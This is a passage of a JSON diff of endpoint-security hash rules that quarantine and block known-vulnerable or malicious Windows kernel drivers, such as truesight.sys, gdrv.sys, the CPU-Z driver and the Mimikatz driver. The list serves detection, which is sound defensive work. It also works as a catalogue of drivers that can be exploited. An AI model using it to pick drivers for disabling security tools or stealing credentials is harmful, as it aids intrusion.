"7442192141d056cef53a570d072759a648393be52019f32e93ccb7aec5715feb", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8bc68ea2-ae89-557f-8f21-d13ced1d7ab7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480365Z", + "creation_date": "2026-03-23T11:45:31.480369Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480379Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b2d29f8984a3c9649765ab359580c590371d32d7279a5553750ce95d0f4f477", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8bd0fc17-6c0d-53d2-97a0-dbdcf564452c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606079Z", + "creation_date": "2026-03-23T11:45:29.606080Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606086Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46621554728bc55438c7c241137af401250f062edef6e7efecf1a6f0f6d0c1f7", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) 
[https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8bd267b4-1790-56ff-ad77-8180b2fa89c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821853Z", + "creation_date": "2026-03-23T11:45:31.821856Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821864Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d04ac62221a46998dfe281b055ca507840fc0275bf7535d11aeac25a80b654c0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8bf73bc3-f8b1-5d4e-8d23-fda0e56ff72e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146710Z", + "creation_date": 
"2026-03-23T11:45:32.146712Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146717Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "331a5bf8965b6410c5517df3ffad4d15afc4390f5b482a6e5fae1c01dd55059f", + "comment": "Vulnerable Kernel Driver (aka 8492937_2_Driver.sys) [https://www.loldrivers.io/drivers/c95a796a-a8f6-4cfa-bc42-4936ecb59091/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c06113b-9892-531f-ba51-22729b956d4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833588Z", + "creation_date": "2026-03-23T11:45:30.833591Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833600Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e132a6ba87d65723faa4a27ac5857bed428fb9983ac817b20a4c37a33070dd0b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"8c095117-2e46-5c71-9449-16ed20955113", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148468Z", + "creation_date": "2026-03-23T11:45:31.148470Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148475Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "63298626b1d4aea3c8b8b838ce3412f4e501986af353004083358922810290ed", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c0b65dd-ab42-58f2-9197-0c842c3b8117", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151599Z", + "creation_date": "2026-03-23T11:45:31.151602Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.151611Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4494f5066385b1ccd758a513c426556b8591288c5bd180ddea35f42bae761b18", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c11cab9-7ce3-549b-bdda-7752d65c6cbd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828022Z", + "creation_date": "2026-03-23T11:45:31.828026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828034Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d0711adbe0d45695e507b196625c70f29f17af40d48e1575903d3c658803ffb2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c19dc67-ed30-5824-8490-74110b6730b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820298Z", + "creation_date": "2026-03-23T11:45:31.820301Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820310Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97b2275049846d6a65b7a684085f6e984db9a6a62e4547a984a7441e14b6bd5a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c308c1d-a694-5f55-b0d1-ecddc04094bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979812Z", + "creation_date": "2026-03-23T11:45:29.979814Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979819Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3700b38d63d426ff0a985226b45eca6e24d052f4262d12aff529e62c2cb889c3", + "comment": "Vulnerable Kernel Driver (aka nt4.sys) [https://www.loldrivers.io/drivers/1d4f7a3a-786b-4a74-b34f-14d44343de9e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c395fec-937e-5e55-ad01-37bd3caf8818", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822037Z", + "creation_date": "2026-03-23T11:45:30.822039Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822046Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a9b98a8234d3e560feef5ec88f35960f631d111351d7085c011e055dfec7d3ce", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c3dc435-ec9d-59a5-94b8-f4e8bb17e528", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 
1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621496Z", + "creation_date": "2026-03-23T11:45:29.621498Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621503Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71ff60722231c7641ad593756108cf6779dbaad21c7b08065fb1d4e225eab14d", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c4c470f-10f4-5078-aec0-2ccf414d7938", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486371Z", + "creation_date": "2026-03-23T11:45:31.486374Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486382Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2d45901faf83202835300cfe959227a39001b8c37681cd67359f36158431c07f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c518d00-1ef3-5487-9b4c-ea857db77aff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971749Z", + "creation_date": "2026-03-23T11:45:29.971751Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971756Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f", + "comment": "PowerTool Hacktool malicious driver (aka kEvP64.sys) [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/HackTool.Win64.ToolPow.A/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c68a0e4-de31-5fa6-b957-10f27179ca83", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479797Z", + "creation_date": "2026-03-23T11:45:31.479800Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479810Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b382a9b09066a08e1db92e46cb2cf14f3741b1a5342a40ec7d1acb00fab7ada", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c6ae79e-7b43-5c5b-b8c7-8d4c55ab8b0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459821Z", + "creation_date": "2026-03-23T11:45:30.459824Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459833Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88992ddcb9aaedb8bfcc9b4354138d1f7b0d7dddb9e7fcc28590f27824bee5c3", + "comment": "Vulnerable Kernel Driver (aka gdrv.sys) [https://www.loldrivers.io/drivers/2bea1bca-753c-4f09-bc9f-566ab0193f4a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c775d63-c31f-57b3-839b-e712bc597999", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832624Z", + "creation_date": "2026-03-23T11:45:30.832626Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832631Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77ae110ba425dcefb6fbfaa7f6a72324361f027cf32fee91f1b13c4add422150", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c797afb-4736-55da-b34c-c721b3c05f0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970280Z", + "creation_date": "2026-03-23T11:45:29.970281Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970287Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ff7578df7293e50c9bdd48657a6ba0c60e1f6d06a2dd334f605af34fe6f75a5", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c7a0810-fbdf-5208-8710-3728c3516c98", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818351Z", + "creation_date": "2026-03-23T11:45:31.818355Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818364Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ee10186740679439654168d2319de2a1a8a3fc1077acb505db8636c28b8dd89", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c7c1adf-cb51-5076-b56b-a2b7c2b551a9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610846Z", + "creation_date": "2026-03-23T11:45:29.610848Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610853Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e0b5a5f8333fc1213791af5c5814d7a99615b3951361ca75f8aa5022c9cfbc2b", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8c99092a-f034-5bdd-b44c-f6fcafb0191b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812562Z", + "creation_date": "2026-03-23T11:45:31.812564Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812570Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "09ada32541233dce3a892b93d39bb02611b3a31d6704f676f83b40f8ce215133", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8ca22587-b8ea-57d3-a2f7-ed29b9e9b48e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826026Z", + "creation_date": "2026-03-23T11:45:31.826029Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826037Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29c2e854791e4f948e2117dde442d8671f6b365efcaf80a1579c08e275e55b34", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8ca2a791-1061-5e13-bb66-573e3875f866", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:31.809006Z", + "creation_date": "2026-03-23T11:45:31.809008Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809013Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae60bdc5497190c5bd278f2e4c7afd1c5b8604d49d1b9f448efc75f7ef9b7d54", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8ca2e12b-dc7b-5bed-935c-2fd03f128dc8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810450Z", + "creation_date": "2026-03-23T11:45:31.810452Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810458Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f3bc8ff2bcfaf8c59ce9b946ea8abf2c0530af9da66b8ccb3760b10264794df", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
